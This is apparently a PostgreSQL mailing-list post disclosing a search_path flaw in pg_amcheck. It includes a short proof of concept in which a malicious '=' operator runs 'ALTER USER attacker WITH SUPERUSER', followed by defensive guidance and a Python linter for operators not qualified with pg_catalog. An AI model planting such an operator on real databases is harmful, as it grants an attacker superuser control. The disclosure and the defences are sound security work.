Hi, hackers!

As I see it, pg_amcheck doesn't set search_path.

It runs SQL queries like:

    SELECT n.nspname, x.extversion
      FROM pg_catalog.pg_extension x
      JOIN pg_catalog.pg_namespace n ON x.extnamespace = n.oid
     WHERE x.extname = 'amcheck'

Let's suppose the database's search_path is set:

    search_path = 'myschema, pg_catalog'

Then:

    CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
        ALTER USER attacker WITH SUPERUSER;
        SELECT $1 OPERATOR(pg_catalog.=) $2;
    $$ LANGUAGE sql;
    CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
                                PROCEDURE = myschema.evil);

Then run pg_amcheck as superuser.

So the user attacker can become SUPERUSER.

Is this scenario worth fixing?

Regards,
Pavel Borisov
Supabase
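The two defensive measures a client tool can take against the problem described in this thread are (a) clearing search_path at connection start, as pg_dump does with `SELECT pg_catalog.set_config('search_path', '', false);`, so that only schema-qualified names and pg_catalog objects resolve, and (b) writing operators as `OPERATOR(pg_catalog.=)` so they cannot be overridden by a user-created operator. The Python below is an added illustration, not code from pg_amcheck or PostgreSQL: it carries the prelude as a constant and implements a small heuristic linter that flags bare operators in a tool's SQL, skipping string literals, `--` comments and already-qualified `OPERATOR(pg_catalog.x)` forms. The sample queries are the one quoted above and a hand-qualified variant; function and type names also resolve via search_path, so the linter complements the prelude rather than replacing it.

```python
import re

# Prelude PostgreSQL's own client tools (pg_dump, for example) send right after
# connecting. With an empty search_path only schema-qualified names and
# pg_catalog objects resolve, so a user-created myschema.= is never selected.
SESSION_PRELUDE = "SELECT pg_catalog.set_config('search_path', '', false);"

# Characters PostgreSQL permits in operator names.
_OPERATOR_CHARS = r"+\-*/<>=~!@#%^&|`?"

# String literals ('' escapes a quote) and -- comments, scanned left to right
# in one pass so a quote inside a comment or a -- inside a string is handled.
_LITERAL_OR_COMMENT = re.compile(r"'(?:[^']|'')*'|--[^\n]*")
# Operators already pinned to pg_catalog; these are safe and are ignored.
_QUALIFIED_OPERATOR = re.compile(
    r"OPERATOR\s*\(\s*pg_catalog\s*\.\s*[" + _OPERATOR_CHARS + r"]+\s*\)",
    re.IGNORECASE,
)
_BARE_OPERATOR = re.compile(r"[" + _OPERATOR_CHARS + r"]+")

# Constructed samples: the query quoted in the post, and the same query with
# its operators qualified the way the evil() body in the post qualifies them.
AMCHECK_QUERY = (
    "SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x "
    "JOIN pg_catalog.pg_namespace n ON x.extnamespace = n.oid "
    "WHERE x.extname = 'amcheck'"
)
AMCHECK_QUERY_QUALIFIED = (
    "SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x "
    "JOIN pg_catalog.pg_namespace n ON x.extnamespace OPERATOR(pg_catalog.=) n.oid "
    "WHERE x.extname OPERATOR(pg_catalog.=) 'amcheck'"
)


def _blank(match):
    # Replace a matched span with spaces so offsets still point into the input.
    return " " * len(match.group(0))


def unqualified_operators(sql):
    """Return (operator, offset) pairs for operators resolved via search_path."""
    scrubbed = _LITERAL_OR_COMMENT.sub(_blank, sql)
    scrubbed = _QUALIFIED_OPERATOR.sub(_blank, scrubbed)
    return [(m.group(0), m.start()) for m in _BARE_OPERATOR.finditer(scrubbed)]


def is_search_path_safe(sql):
    """True when no operator in `sql` depends on the session's search_path."""
    return not unqualified_operators(sql)


if __name__ == "__main__":
    print("prelude to send first:", SESSION_PRELUDE)
    for name, query in (("original", AMCHECK_QUERY),
                        ("qualified", AMCHECK_QUERY_QUALIFIED)):
        hits = unqualified_operators(query)
        print(f"{name}: {len(hits)} unqualified operator(s)", hits)
```

The linter reports two bare `=` in the query from the post and none in the qualified variant; a tool that sends SESSION_PRELUDE before its first real query is protected regardless of what the linter finds.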

